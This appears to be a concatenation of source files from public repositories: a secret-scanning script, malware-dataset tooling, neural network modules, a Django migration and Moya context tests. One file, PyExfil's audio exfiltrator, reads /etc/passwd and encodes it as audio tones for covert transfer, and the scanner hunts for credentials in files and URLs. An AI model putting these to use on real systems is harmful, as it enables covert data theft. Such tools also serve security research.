"linkFinder": "(?:\"|')(((?:[a-zA-Z]{1,10}:\/\/|\/\/)[^\"'\/]{1,}\\.[a-zA-Z]{2,}[^\"']{0,})|((?:\/|\\.\\.\/|\\.\/)[^\"'><,;| *()(%%$^\/\\\\\\[\\]][^\"'><,;|()]{1,})|([a-zA-Z0-9_\\-\/]{1,}\/[a-zA-Z0-9_\\-\/]{1,}\\.(?:[a-zA-Z]{1,4}|action)(?:[\\?|#][^\"|']{0,}|))|([a-zA-Z0-9_\\-\/]{1,}\/[a-zA-Z0-9_\\-\/]{3,}(?:[\\?|#][^\"|']{0,}|))|([a-zA-Z0-9_\\-]{1,}\\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:[\\?|#][^\"|']{0,}|)))(?:\"|')",
"password_in_url": "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]"
}
patterns = list(zip(patterns.keys(), patterns.values()))
# Base Variables
def request(url):
try:
headers = {"User-Agent":settings["requestUA"]} # define http request headers as dictionary
        response = requests.get(url, headers=headers, timeout=settings["requestTimeout"])  # pass the UA header defined above
print("[+] " + url)
return response.text
except Exception as e:
return ""
def printResult(x,y):
if "--colored" in args: # if colored parameter has given as argument
print(colored("[{}] {}".format(x,y),random.choice(colors))) # print output colored
else:
print("[{}] {}".format(x,y)) # print output normally
def extract(text):
for p in patterns:
pattern = r"[:|=|\'|\"|\s*|`|´| |,|?=|\]|\|//|/\*}]("+p[1]+r")[:|=|\'|\"|\s*|`|´| |,|?=|\]|\}|&|//|\*/]"
res = re.findall(re.compile(pattern),text) # try to find all patterns in text
for i in res:
printResult(p[0],i) # call printResults for each result
def splitArgs(text):
try:
return text.split("\n")
except Exception:
return text
def fromUrl(url):
if not (url.startswith("http://") or url.startswith("https://")):
extract(request("http://"+url))
extract(request("https://"+url))
else:
extract(request(url))
args = list(sys.argv)[1:]
if "--file" in args: # if file parameter has given as argument
totalFiles = []
for root, dirs, files in os.walk("."):
tempFiles = [os.path.join(os.getcwd(),os.path.join(root, i)[2:]) for i in files] # find every file under current directory
totalFiles+=tempFiles # and add them to totalFiles array
for file in totalFiles: # for each files
try:
read = open(file, "r", encoding='utf-8').read() # read them
print ("[+] " + file)
extract(read) # and call extract function
except Exception: # if it gives error
pass # just ignore it
elif "--request" in args: # if request parameter has given as argument
try:
threadPool = ThreadPoolExecutor(max_workers=settings["threads"])
pipeText = sys.stdin.read() # read urls
for r in splitArgs(pipeText):
threadPool.submit(fromUrl,r)
except UnicodeDecodeError as e:
print("[error] binary files are not supported yet.")
elif ("--help" in args) or ("-h" in args):
try:
print ("Usage:")
print ("For getting keys from file: cat file | python3 zile.py")
print ("For getting keys from urls/domains: cat urls | python3 zile.py --request")
print ("For getting keys from all files under current dir: python3 zile.py --file")
print ("For colored output use --colored parameter")
except Exception as e:
print("[error] got an exception")
else:  # if no flag was given
try:
extract(str(sys.stdin.read()))
except UnicodeDecodeError as e:
print("[error] binary files are not supported yet.")
|
src/utility/convert_software_call.py | ocatak/malware_api_class | 172 | 11178596 | <reponame>ocatak/malware_api_class<filename>src/utility/convert_software_call.py
from common.HashMap import HashMap
file = open("source/CallApiMap.txt", "r")
map = HashMap()
# CallApiMap.txt holds one "<name>=<value>" mapping per line
for line in file:
line = line.strip()
if line == "":
continue
splitted = line.split("=")
print(line)
map.add(splitted[0], splitted[1])
map.print()
file.close()
s_file = open("destination/software_calls.txt", "w")
file = open("source/02-CSDMC_API_Train.csv", "r")
for line in file:
line = line.strip()
splitted = line.split(",")
if splitted[0] == "0":
continue
calls = splitted[1].split(" ")
callLine = ""
for callStr in calls:
if callLine != "":
callLine = callLine + ","
callStr = callStr.lower()
val = map.get(callStr)
        if val is None:
            print("invalid case---------------")  # call string missing from the map
            continue
callLine = callLine + val
s_file.write(callLine + "\n")
s_file.close()
|
pyexfil/physical/audio/exfiltrator.py | goffinet/PyExfil | 603 | 11178622 | <reponame>goffinet/PyExfil
#!/usr/bin/python
from __future__ import division #Avoid division problems in Python 2
import sys
import math
import zlib
import base64
import pyaudio
PyAudio = pyaudio.PyAudio
BITRATE = 14400
RATE = 16000
class Exfiltrator():
def __init__(self, file_path):
self.file_path = file_path
self.PyAudio = PyAudio()
self.streamer = self.PyAudio.open(format=self.PyAudio.get_format_from_width(1), channels=1, rate=BITRATE, output=True)
# WAVE = 1000
def _read_file(self):
try:
f = open(self.file_path, 'rb')
tones = base64.b64encode(zlib.compress(f.read()))
f.close()
return tones
except IOError, e:
sys.stdout.write("[!]\tError reading file '%s'.\n%s.\n" % (self.file_path, e))
raise
def _close(self):
self.streamer.stop_stream()
self.streamer.close()
self.PyAudio.terminate()
def _play_tones(self, tones):
i = 0
for tone in tones:
            i += 1
            freq = ord(tone)*10  # map each base64 byte (its ASCII code) to a tone frequency
            data = ''.join([chr(int(math.sin(x/((BITRATE/freq)/math.pi))*127+128)) for x in xrange(BITRATE)])[:256]  # a short 8-bit sine burst per byte
            self.streamer.write(data)
if i % 10 == 0: sys.stdout.write("Played %s Bytes.\n" % i)
sys.stdout.write("Completed playing %s tones.\n" % i)
return True
def exfil(self):
tones = self._read_file()
sys.stdout.write("File '%s' is %s bytes after encoding.\n" %(self.file_path, len(tones)))
self._play_tones(tones)
self._close()
if __name__ == "__main__":
audExf = Exfiltrator(file_path="/etc/passwd")
audExf.exfil()
|
python-package/setup.py | Priveyes/tgboost | 350 | 11178632 | <filename>python-package/setup.py<gh_stars>100-1000
from distutils.core import setup
setup(
name='tgboost',
version='1.0',
description='tiny gradient boosting tree',
author='wepon',
author_email='<EMAIL>',
url='http://wepon.me',
packages=['tgboost'],
package_data={'tgboost': ['tgboost.jar']},
package_dir={'tgboost': 'tgboost'},
)
|
pico8/game/formatter/rom.py | lifning/picotool | 310 | 11178633 | <filename>pico8/game/formatter/rom.py<gh_stars>100-1000
"""File formatter for .rom files"""
__all__ = [
'ROMFormatter',
]
from .base import BaseFormatter
# from .. import compress
# from ..game import Game
# from ... import util
# from ...lua.lua import Lua
# from ...gfx.gfx import Gfx
# from ...gff.gff import Gff
# from ...map.map import Map
# from ...sfx.sfx import Sfx
# from ...music.music import Music
# TODO: Refactor P8PNGFormatter to use this as a basis and separate out the
# PNG aspect. (It's the same data, P8PNG takes the extra step of merging with a
# label PNG file steganographically.)
class ROMFormatter(BaseFormatter):
@classmethod
def from_file(cls, instr, filename=None, *args, **kwargs):
"""Reads a game from a .rom file.
Args:
instr: The input stream.
filename: The filename, if any, for tool messages.
Returns:
A Game containing the game data.
"""
raise NotImplementedError()
@classmethod
def to_file(
cls, game, outstr, lua_writer_cls=None, lua_writer_args=None,
filename=None, *args, **kwargs):
"""Writes a game to a .rom file.
Args:
game: The Game to write.
outstr: The output stream.
lua_writer_cls: The Lua writer class to use. If None, defaults to
LuaEchoWriter.
lua_writer_args: Args to pass to the Lua writer.
filename: The filename, if any, for tool messages.
"""
raise NotImplementedError()
|
components/isceobj/TopsProc/runCropOffsetGeo.py | vincentschut/isce2 | 1,133 | 11178672 | #
# Author: <NAME>
# Copyright 2016
#
import os
import isceobj
import logging
import numpy as np
from imageMath import IML
def runCropOffsetGeo(self):
'''
Crops and resamples lat/lon/los/z images created by topsApp to the
same grid as the offset field image.
'''
print('\n====================================')
print('Cropping topo products to offset grid...')
print('====================================')
suffix = '.full'
if (self.numberRangeLooks == 1) and (self.numberAzimuthLooks == 1):
suffix=''
flist1b = ['lat.rdr'+suffix, 'lon.rdr'+suffix, 'z.rdr'+suffix]
flist2b = [self._insar.mergedLosName+suffix]
    # right/bottom edges of the offset grid, in full-resolution pixels
    wend = (self.offset_width*self.skipwidth) + self.offset_left
    lend = (self.offset_length*self.skiphgt) + self.offset_top
for filename in flist1b:
print('\nCropping %s to %s ...\n' % (filename,filename+'.crop'))
f = os.path.join(self._insar.mergedDirname, filename)
outArr = []
mmap = IML.mmapFromISCE(f,logging)
'''
for i in range(self.offset_top, mmap.length, self.skiphgt):
outArr.append(mmap.bands[0][i][self.offset_left::self.skipwidth])
'''
for i in range(self.offset_top, lend, self.skiphgt):
outArr.append(mmap.bands[0][i][self.offset_left:wend:self.skipwidth])
outFile = os.path.join(self._insar.mergedDirname, filename+'.crop')
outImg = isceobj.createImage()
outImg.bands = 1
outImg.scheme = 'BIP'
outImg.dataType = 'DOUBLE'
outImg.setWidth(len(outArr[0]))
outImg.setLength(len(outArr))
outImg.setFilename(outFile)
with open(outFile,'wb') as fid:
for i in range(len(outArr)):
np.array(outArr[i]).astype(np.double).tofile(fid) ### WAY easier to write to file like this
outImg.renderHdr()
print('Cropped %s' % (filename))
for filename in flist2b:
print('\nCropping %s to %s ...\n' % (filename,filename+'.crop'))
f = os.path.join(self._insar.mergedDirname, filename)
outArrCh1 = []
outArrCh2 = []
mmap = IML.mmapFromISCE(f,logging)
'''
for i in range(self.offset_top, mmap.length, self.skiphgt):
outArrCh1.append(mmap.bands[0][i][self.offset_left::self.skipwidth])
outArrCh2.append(mmap.bands[1][i][self.offset_left::self.skipwidth])
'''
for i in range(self.offset_top, lend, self.skiphgt):
outArrCh1.append(mmap.bands[0][i][self.offset_left:wend:self.skipwidth])
outArrCh2.append(mmap.bands[1][i][self.offset_left:wend:self.skipwidth])
outFile = os.path.join(self._insar.mergedDirname, filename+'.crop')
outImg = isceobj.createImage()
outImg.bands = 2
outImg.scheme = 'BIL'
outImg.dataType = 'FLOAT'
outImg.setWidth(len(outArrCh1[0]))
outImg.setLength(len(outArrCh1))
outImg.setFilename(outFile)
with open(outFile,'wb') as fid:
for i in range(len(outArrCh1)):
np.array(outArrCh1[i]).astype(np.float32).tofile(fid)
np.array(outArrCh2[i]).astype(np.float32).tofile(fid)
outImg.renderHdr()
print('Cropped %s' % (filename))
if __name__ == "__main__":
'''
Default run method for runCropOffsetGeo.
'''
main()
|
models/network_dpsr.py | WestCityInstitute/KAIR | 1,521 | 11178675 | import math
import torch.nn as nn
import models.basicblock as B
"""
# --------------------------------------------
# modified SRResNet
# -- MSRResNet_prior (for DPSR)
# --------------------------------------------
References:
@inproceedings{zhang2019deep,
title={Deep Plug-and-Play Super-Resolution for Arbitrary Blur Kernels},
author={<NAME> and <NAME> and <NAME>},
booktitle={IEEE Conference on Computer Vision and Pattern Recognition},
pages={1671--1681},
year={2019}
}
@inproceedings{wang2018esrgan,
title={Esrgan: Enhanced super-resolution generative adversarial networks},
author={<NAME> and <NAME> <NAME> <NAME> <NAME> <NAME>},
booktitle={European Conference on Computer Vision (ECCV)},
pages={0--0},
year={2018}
}
@inproceedings{ledig2017photo,
title={Photo-realistic single image super-resolution using a generative adversarial network},
author={<NAME> Theis, <NAME>, <NAME>, <NAME>, <NAME> Acosta, <NAME>, <NAME> <NAME> and others},
booktitle={IEEE conference on computer vision and pattern recognition},
pages={4681--4690},
year={2017}
}
# --------------------------------------------
"""
# --------------------------------------------
# MSRResNet super-resolver prior for DPSR
# https://github.com/cszn/DPSR
# https://github.com/cszn/DPSR/blob/master/models/network_srresnet.py
# --------------------------------------------
class MSRResNet_prior(nn.Module):
def __init__(self, in_nc=4, out_nc=3, nc=96, nb=16, upscale=4, act_mode='R', upsample_mode='upconv'):
super(MSRResNet_prior, self).__init__()
n_upscale = int(math.log(upscale, 2))
if upscale == 3:
n_upscale = 1
m_head = B.conv(in_nc, nc, mode='C')
m_body = [B.ResBlock(nc, nc, mode='C'+act_mode+'C') for _ in range(nb)]
m_body.append(B.conv(nc, nc, mode='C'))
if upsample_mode == 'upconv':
upsample_block = B.upsample_upconv
elif upsample_mode == 'pixelshuffle':
upsample_block = B.upsample_pixelshuffle
elif upsample_mode == 'convtranspose':
upsample_block = B.upsample_convtranspose
else:
raise NotImplementedError('upsample mode [{:s}] is not found'.format(upsample_mode))
if upscale == 3:
m_uper = upsample_block(nc, nc, mode='3'+act_mode)
else:
m_uper = [upsample_block(nc, nc, mode='2'+act_mode) for _ in range(n_upscale)]
H_conv0 = B.conv(nc, nc, mode='C'+act_mode)
H_conv1 = B.conv(nc, out_nc, bias=False, mode='C')
m_tail = B.sequential(H_conv0, H_conv1)
self.model = B.sequential(m_head, B.ShortcutBlock(B.sequential(*m_body)), *m_uper, m_tail)
def forward(self, x):
x = self.model(x)
return x
class SRResNet(nn.Module):
def __init__(self, in_nc=3, out_nc=3, nc=64, nb=16, upscale=4, act_mode='R', upsample_mode='upconv'):
super(SRResNet, self).__init__()
n_upscale = int(math.log(upscale, 2))
if upscale == 3:
n_upscale = 1
m_head = B.conv(in_nc, nc, mode='C')
m_body = [B.ResBlock(nc, nc, mode='C'+act_mode+'C') for _ in range(nb)]
m_body.append(B.conv(nc, nc, mode='C'))
if upsample_mode == 'upconv':
upsample_block = B.upsample_upconv
elif upsample_mode == 'pixelshuffle':
upsample_block = B.upsample_pixelshuffle
elif upsample_mode == 'convtranspose':
upsample_block = B.upsample_convtranspose
else:
raise NotImplementedError('upsample mode [{:s}] is not found'.format(upsample_mode))
if upscale == 3:
m_uper = upsample_block(nc, nc, mode='3'+act_mode)
else:
m_uper = [upsample_block(nc, nc, mode='2'+act_mode) for _ in range(n_upscale)]
H_conv0 = B.conv(nc, nc, mode='C'+act_mode)
H_conv1 = B.conv(nc, out_nc, bias=False, mode='C')
m_tail = B.sequential(H_conv0, H_conv1)
self.model = B.sequential(m_head, B.ShortcutBlock(B.sequential(*m_body)), *m_uper, m_tail)
def forward(self, x):
x = self.model(x)
        return x
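# Hedged construction sketch using the defaults above. The DPSR prior takes
# RGB plus one extra noise/kernel-map channel, hence in_nc=4; the tensor
# shapes are illustrative.
#
#   import torch
#   net = MSRResNet_prior(in_nc=4, out_nc=3, nc=96, nb=16, upscale=4)
#   out = net(torch.randn(1, 4, 32, 32))   # -> (1, 3, 128, 128)
|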
mmdet3d/models/sst/sra_block.py | collector-m/SST | 217 | 11178682 | import torch
import torch.nn as nn
from torch.utils.checkpoint import checkpoint
from mmcv.runner import auto_fp16
from mmcv.cnn import build_norm_layer
from mmdet3d.ops import flat2window, window2flat, SRATensor, DebugSRATensor, spconv
from ipdb import set_trace
import os
import pickle as pkl
class WindowAttention(nn.Module):
def __init__(self, d_model, nhead, dropout, batch_first=False, layer_id=None):
super().__init__()
self.nhead = nhead
# from mmdet3d.models.transformer.my_multi_head_attention import MyMultiheadAttention
# self.self_attn = MyMultiheadAttention(d_model, nhead, dropout=dropout, batch_first=False)
self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout)
self.layer_id = layer_id
def forward(self, sra_tensor, do_shift):
'''
Args:
Out:
shifted_feat_dict: the same type as window_feat_dict
'''
assert isinstance(sra_tensor, SRATensor)
out_feat_dict = {}
win_feat_dict, mask_dict = sra_tensor.window_tensor(do_shift)
pos_dict = sra_tensor.position_embedding(do_shift)
for name in win_feat_dict:
# [n, num_token, embed_dim]
pos = pos_dict[name]
pos = pos.permute(1, 0, 2)
feat_3d = win_feat_dict[name]
feat_3d = feat_3d.permute(1, 0, 2)
key_padding_mask = mask_dict[name]
v = feat_3d
q = k = feat_3d + pos
out_feat_3d, attn_map = self.self_attn(q, k, value=v, key_padding_mask=key_padding_mask)
out_feat_dict[name] = out_feat_3d.permute(1, 0, 2)
sra_tensor.update(out_feat_dict)
return sra_tensor
class EncoderLayer(nn.Module):
def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1,
activation="relu", batch_first=False, layer_id=None, mlp_dropout=0):
super().__init__()
assert not batch_first, 'Current version of PyTorch does not support batch_first in MultiheadAttention. After upgrading pytorch, do not forget to check the layout of MLP and layer norm to enable batch_first option.'
self.batch_first = batch_first
self.win_attn = WindowAttention(d_model, nhead, dropout, layer_id=layer_id)
# Implementation of Feedforward model
self.linear1 = nn.Linear(d_model, dim_feedforward)
self.dropout = nn.Dropout(mlp_dropout)
self.linear2 = nn.Linear(dim_feedforward, d_model)
self.norm1 = nn.LayerNorm(d_model)
self.norm2 = nn.LayerNorm(d_model)
self.dropout1 = nn.Dropout(mlp_dropout)
self.dropout2 = nn.Dropout(mlp_dropout)
self.activation = _get_activation_fn(activation)
self.fp16_enabled=True
# @auto_fp16(apply_to=('att_input'))
def forward(
self,
input,
do_shift
):
assert isinstance(input, SRATensor)
src = input.features
output = self.win_attn(input, do_shift) #[N, d_model]
src2 = output.features
src = src + self.dropout1(src2)
src = self.norm1(src)
src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))
src = src + self.dropout2(src2)
src = self.norm2(src)
output.set_features(src)
# output = spconv.SparseConvTensor(src, att_input.indices, None, None)
# att_output.features = src
return output
class SRABlock(nn.Module):
''' Consist of two encoder layer, shift and shift back.
'''
def __init__(self, key, d_model, nhead, dim_feedforward, window_shape, dropout=0.1,
activation="relu", batch_first=False, block_id=-100):
super().__init__()
# SRABlock(d_model[i], nhead[i], dim_feedforward[i], window_shape
# dropout, activation, batch_first=False, block_id=i)
encoder_1 = EncoderLayer(d_model, nhead, dim_feedforward, dropout,
activation, batch_first, layer_id=block_id * 2 + 0)
encoder_2 = EncoderLayer(d_model, nhead, dim_feedforward, dropout,
activation, batch_first, layer_id=block_id * 2 + 1)
# BasicShiftBlock(d_model[i], nhead[i], dim_feedforward[i], dropout, activation, batch_first=False)
self.encoder_list = nn.ModuleList([encoder_1, encoder_2])
self.window_shape = window_shape
self.key = key
def forward(
self,
input,
batching_info,
using_checkpoint=False,
):
assert isinstance(input, SRATensor)
output = input
if not output.ready:
output.setup(batching_info, self.key, self.window_shape, 10000)
for i in range(2):
layer = self.encoder_list[i]
if using_checkpoint:
output = checkpoint(layer, output, i == 1)
else:
output = layer(output, i == 1)
return output
def _get_activation_fn(activation):
"""Return an activation function given a string"""
if activation == "relu":
return torch.nn.functional.relu
if activation == "gelu":
return torch.nn.functional.gelu
if activation == "glu":
return torch.nn.functional.glu
raise RuntimeError(F"activation should be relu/gelu, not {activation}.") |
sponsors/migrations/0031_auto_20210810_1232.py | ewjoachim/pythondotorg | 911 | 11178683 | # Generated by Django 2.0.13 on 2021-08-10 12:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sponsors', '0030_auto_20210715_2023'),
]
operations = [
migrations.AlterField(
model_name='sponsorcontact',
name='administrative',
field=models.BooleanField(default=False, help_text='Administrative contacts will only be notified regarding contracts.'),
),
migrations.AlterField(
model_name='sponsorcontact',
name='primary',
field=models.BooleanField(default=False, help_text='The primary contact for a sponsorship will be responsible for managing deliverables we need to fulfill benefits. Primary contacts will receive all email notifications regarding sponsorship.'),
),
]
|
frontend/context_processors.py | hungbbear/spleeter-web | 202 | 11178746 | <gh_stars>100-1000
import os
def debug(context):
return {'DJANGO_DEVELOPMENT': os.getenv('DJANGO_DEVELOPMENT')}
|
moya/tests/test_context.py | moyaproject/moya | 129 | 11178764 | <filename>moya/tests/test_context.py
from __future__ import unicode_literals
from __future__ import print_function
import unittest
from moya.context import Context
from moya.context import dataindex
class TestDataIndex(unittest.TestCase):
def test_parse(self):
"""Test dataindex parse"""
tests = [
("", []),
(".", []),
('""', [""]),
("\\\\", ["\\"]),
("foo", ["foo"]),
("foo.bar", ["foo", "bar"]),
(".foo.bar", ["foo", "bar"]),
("foo.bar.baz", ["foo", "bar", "baz"]),
('"foo"', ["foo"]),
('"foo".bar', ["foo", "bar"]),
('"foo.bar"', ["foo.bar"]),
("foo\.bar", ["foo.bar"]),
("1", [1]),
('"1"', ["1"]),
("foo.2", ["foo", 2]),
]
for index, parsed in tests:
self.assertEqual(dataindex.parse(index), parsed)
def test_build(self):
"""Test encoding indices as a dataindex string"""
self.assertEqual(dataindex.build(["Hello", "World", 1]), "Hello.World.1")
self.assertEqual(dataindex.build(["Hello"]), "Hello")
def test_join(self):
"""Test joining of indices"""
self.assertEqual(dataindex.join("foo"), "foo")
self.assertEqual(dataindex.join("foo", "bar.baz"), "foo.bar.baz")
self.assertEqual(dataindex.join("foo", "bar\.baz"), 'foo."bar.baz"')
self.assertEqual(dataindex.join("foo", '"bar.baz"'), 'foo."bar.baz"')
self.assertEqual(dataindex.join("foo", "bar.baz.1:5"), "foo.bar.baz.1:5")
self.assertEqual(dataindex.join("foo", "bar", "baz"), "foo.bar.baz")
self.assertEqual(dataindex.join("foo", ["bar", "baz"]), "foo.bar.baz")
self.assertEqual(dataindex.join(".foo", "bar", "baz"), ".foo.bar.baz")
self.assertEqual(dataindex.join("foo", ".bar", "baz"), ".bar.baz")
def test_normalize(self):
"""Test normalizing indices"""
self.assertEqual(dataindex.normalize("foo"), "foo")
self.assertEqual(dataindex.normalize(r"\foo"), "foo")
self.assertEqual(dataindex.normalize(r"\f\o\o"), "foo")
self.assertEqual(dataindex.normalize('"foo"'), "foo")
def test_make_absolute(self):
"""Test making a data index absolute"""
self.assertEqual(dataindex.make_absolute("foo.bar"), ".foo.bar")
self.assertEqual(dataindex.make_absolute(".foo.bar"), ".foo.bar")
def test_iter_index(self):
"""Test iter_index method"""
self.assertEqual(
list(dataindex.iter_index("foo.bar.baz")),
[("foo", "foo"), ("bar", "foo.bar"), ("baz", "foo.bar.baz")],
)
class TestContext(unittest.TestCase):
def setUp(self):
pass
def test_basic_root(self):
"""Test basic operations from root"""
c = Context()
c["foo"] = "bar"
self.assert_("foo" in c)
self.assertEqual(c["foo"], "bar")
self.assertEqual(c.root["foo"], "bar")
c["fruit"] = "apple"
self.assert_("fruit" in c)
self.assertEqual(c["fruit"], "apple")
self.assertEqual(c.root["fruit"], "apple")
self.assertEqual(c.get("nothere", "missing"), "missing")
self.assertEqual(sorted(c.keys()), ["foo", "fruit"])
self.assertEqual(sorted(c.values()), ["apple", "bar"])
self.assertEqual(sorted(c.items()), [("foo", "bar"), ("fruit", "apple")])
def test_attr(self):
"""Test attribute / getitem distinction"""
class A(object):
foo = "buzz"
bar = "cantsee"
def __getitem__(self, key):
if key == "foo":
return "baz"
raise IndexError(key)
def __contains__(self, key):
return key == "foo"
c = Context()
c["a"] = A()
self.assertEqual(c["a.foo"], "baz")
self.assert_(c["a.bar"].moya_missing)
# self.assertRaises(errors.ContextKeyError, c.__getitem__, "a.bar")
self.assert_("a.bar" not in c)
self.assert_("a.foo" in c)
def test_get_root(self):
"""Test looking up root object"""
c = Context({"foo": [1, 2, 3]})
self.assertEqual(c[""], {"foo": [1, 2, 3]})
c.push_frame("foo")
self.assertEqual(c[""], [1, 2, 3])
c.push_frame(".foo")
self.assertEqual(c[""], [1, 2, 3])
c.push_frame(".")
self.assertEqual(c[""], {"foo": [1, 2, 3]})
def test_inspect(self):
"""Test keys/values/items"""
c = Context()
c["foo"] = dict(a=1, b=2, c=3)
c["bar"] = ["a", "b", "c"]
def compare(a, b):
a = sorted(a, key=lambda k: str(k.__class__.__name__))
b = sorted(b, key=lambda k: str(k.__class__.__name__))
for compare_a, compare_b in zip(a, b):
self.assertEqual(compare_a, compare_b)
self.assertEqual(sorted(c.keys()), ["bar", "foo"])
self.assertEqual(sorted(c.keys("foo")), ["a", "b", "c"])
self.assertEqual(sorted(c.keys("bar")), [0, 1, 2])
compare((c.values()), [dict(a=1, b=2, c=3), ["a", "b", "c"]])
self.assertEqual(sorted(c.values("foo")), [1, 2, 3])
self.assertEqual(sorted(c.values("bar")), ["a", "b", "c"])
compare(
sorted(c.items()),
sorted([("foo", dict(a=1, b=2, c=3)), ("bar", ["a", "b", "c"])]),
)
self.assertEqual(sorted(c.items("foo")), [("a", 1), ("b", 2), ("c", 3)])
self.assertEqual(sorted(c.items("bar")), [(0, "a"), (1, "b"), (2, "c")])
self.assertEqual(
sorted(c.all_keys()),
sorted(
["", "foo", "foo.a", "foo.c", "foo.b", "bar", "bar.0", "bar.1", "bar.2"]
),
)
def test_frame_stack(self):
"""Test push/pop frame operations"""
c = Context()
c["foo"] = {}
c.push_frame("foo")
self.assertEqual(c.get_frame(), ".foo")
c["bar"] = 1
self.assertEqual(c.root["foo"]["bar"], 1)
c.pop_frame()
self.assertEqual(c.get_frame(), ".")
c["baz"] = 2
self.assertEqual(c.root["baz"], 2)
def test_root_indices(self):
"""Test root indices"""
c = Context()
c["foo"] = {}
c["baz"] = 2
c.push_frame("foo") # In .foo
c["bar"] = 1
self.assertEqual(c[".baz"], 2)
self.assertEqual(c["bar"], 1)
c.push_frame(".") # In .
self.assertEqual(c["baz"], 2)
self.assertEqual(c["foo.bar"], 1)
c.pop_frame() # In .foo
self.assertEqual(c[".baz"], 2)
self.assertEqual(c["bar"], 1)
self.assertEqual(c[".foo.bar"], 1)
def test_expressions(self):
"""Test expression evaluation"""
c = Context()
c["foo"] = {}
c["baz"] = 2
c["foo.a"] = 10
c["foo.b"] = 20
c["foo.c"] = dict(inception="three levels")
c["word"] = "apples"
c["word2"] = c["word"]
c["lt"] = "less than"
class ChoiceTest(object):
def __init__(self):
self.choices = []
c["choicetest"] = ChoiceTest()
class Obj(object):
def __init__(self, id):
self.id = id
c["objects"] = [Obj(1), Obj(2), Obj(3)]
tests = [
("1", 1),
("123", 123),
('"1"', "1"),
("'1'", "1"),
('"\\""', '"'),
("'''1'''", "1"),
('"""1"""', "1"),
("100-5", 95),
("7//2", 3),
("1+1", 2),
("1+2+3", 6),
("2+3*2", 8),
("(2+3)*2", 10),
("foo.a", 10),
("$foo.a", 10),
("$lt", "less than"),
("foo.c.inception", "three levels"),
# ('foo.c.inception.:5 + " "+"little pigs"', "three little pigs"),
# ('foo.c.inception.::-1', "slevel eerht"),
("foo.a+foo.b", 30),
(".foo.a+.foo.b", 30),
("foo.a/2", 5),
("foo.a/4", 2.5),
("word*3", "applesapplesapples"),
("word.2*3", "ppp"),
("word+str:2", "apples2"),
('word^="a"', True),
('word^="app"', True),
('word^="ppa"', False),
('word$="les"', True),
('word$="s"', True),
("2!=3", True),
("2>1", True),
("1<2", True),
("1>2", False),
("3<1", False),
("1==1", True),
("10>=10", True),
("9.9<=10", True),
("foo.a==10", True),
('foo.a=="a"', False),
("foo.a=='a'", False),
("3*2>5", True),
("2 gt 1", True),
("1 lt 2", True),
("1 gt 2", False),
("3 lt 1", False),
("10 gte 10", True),
("9.9 lte 10", True),
("3*2 gt 5", True),
("None", None),
("True", True),
("False", False),
("yes", True),
("no", False),
('int:"3"', 3),
("str:50", "50"),
('float:"2.5"', 2.5),
('bool:"test"', True),
("bool:1", True),
('bool:""', False),
("isint:5", True),
('isint:"5"', False),
("isnumber:2", True),
("isnumber:2.5", True),
('isnumber:"a"', False),
("isfloat:1.0", True),
("isfloat:1", False),
("isstr:1", False),
('isstr:"a"', True),
("isbool:True", True),
("isbool:False", True),
("isbool:(2+1)", False),
("isbool:bool:1", True),
("isbool:bool:0", True),
("len:word", 6),
("True and True", True),
("False and False", False),
("True or False", True),
("False or False", False),
# ('2>1 and word.-1=="s"', True),
('word=="apples"', True),
('1==2 or word=="apples"', True),
("'a' in 'apples'", True),
("'ppl' in 'apples'", True),
("word.1==word.2", True),
("word is word2", True),
("'index.html' fnmatches '*.html'", True),
("'foo/index.html' fnmatches '*.html'", True),
("'index.html' fnmatches '*.py'", False),
("'index.html' fnmatches '*.h??l'", True),
("'hello, world' matches /.*world/", True),
("'hello, will' matches /.*world/", False),
("'hello, world' matches '.*world'", True),
("'hello, will' matches '.*world'", False),
("'inception' in foo['c']", True),
("'inception' in (foo['c'])", True),
("exists:foo", True),
("exists:baz", True),
("exists:asdfsadf", False),
("missing:foo", False),
("missing:nobodyherebutuschickens", True),
("missing:yesterday", True),
("missing:foo.bar.baz", True),
("missing:andrew", True),
("'1' instr [1,2,3,4]", True),
("'5' instr [1,2,3,4]", False),
("'1' not instr [1,2,3,4]", False),
("'5' not instr [1,2,3,4]", True),
("1 in None", False),
("1 instr None", False),
("a=1", {"a": 1}),
('{"a":1}', {"a": 1}),
("[1,2,3]", [1, 2, 3]),
("[1,2,3,[4,5,6]]", [1, 2, 3, [4, 5, 6]]),
("[1,2,3,[4,5,6,[7,8,9]]]", [1, 2, 3, [4, 5, 6, [7, 8, 9]]]),
("[1]", [1]),
("[]", []),
("d:'5'", 5),
("d:'5' + 1", 6),
("d:'5' + d:'1'", 6),
("debug:d:5", "d:'5'"),
("filesize:1024", "1.0 KB"),
("abs:-3.14", 3.14),
('basename:"/foo/bar/baz"', "baz"),
('bool:""', False),
('capitalize:"hello"', "Hello"),
("ceil:3.14", 4),
("choices:choicetest", []),
("chain:[[1, 2], [3, 4]]", [1, 2, 3, 4]),
("chr:65", "A"),
("collect:[['hello', 'world'], 0]", ["h", "w"]),
(
"sorted:items:collectmap:[['hello', 'world'], 0]",
[("h", "hello"), ("w", "world")],
),
("collectids:objects", [1, 2, 3]),
("commalist:['hello', 'world']", "hello,world"),
("commaspacelist:['hello', 'world']", "hello, world"),
("'hello\\nworld'", "hello\nworld"),
(r"'you can \"quote me\" on that'", 'you can "quote me" on that'),
("'\\\\'", "\\"),
("'helloworld'[1]", "e"),
("'helloworld'[-1]", "d"),
("'helloworld'[:2]", "he"),
("'helloworld'[2:4]", "ll"),
("'helloworld'[::-1]", "dlrowolleh"),
]
for expression, result in tests:
print(expression, result)
expression_result = c.eval(expression)
print("\t", expression_result)
self.assertEqual(expression_result, result)
def test_expression_index(self):
"""Test the index operator"""
c = Context()
c["foo"] = {}
c["baz"] = 2
c["foo.a"] = 10
c["foo.b"] = 20
c["foo.c"] = dict(inception="three levels")
c["word"] = "apples"
c["word2"] = c["word"]
c["lt"] = "less than"
class Obj(object):
def __init__(self):
self.n = 123
self.foo = ["Hello", "World", "!"]
c["o"] = Obj()
tests = [
('"apples"[0]', "a"),
('"apples"[1]', "p"),
('"apples"[1+2]', "l"),
('"apples"[-1]', "s"),
('foo["a"]', 10),
('foo["b"]', 20),
('foo["c"]', dict(inception="three levels")),
('foo["c"]["inception"]', "three levels"),
('foo.c["inception"]', "three levels"),
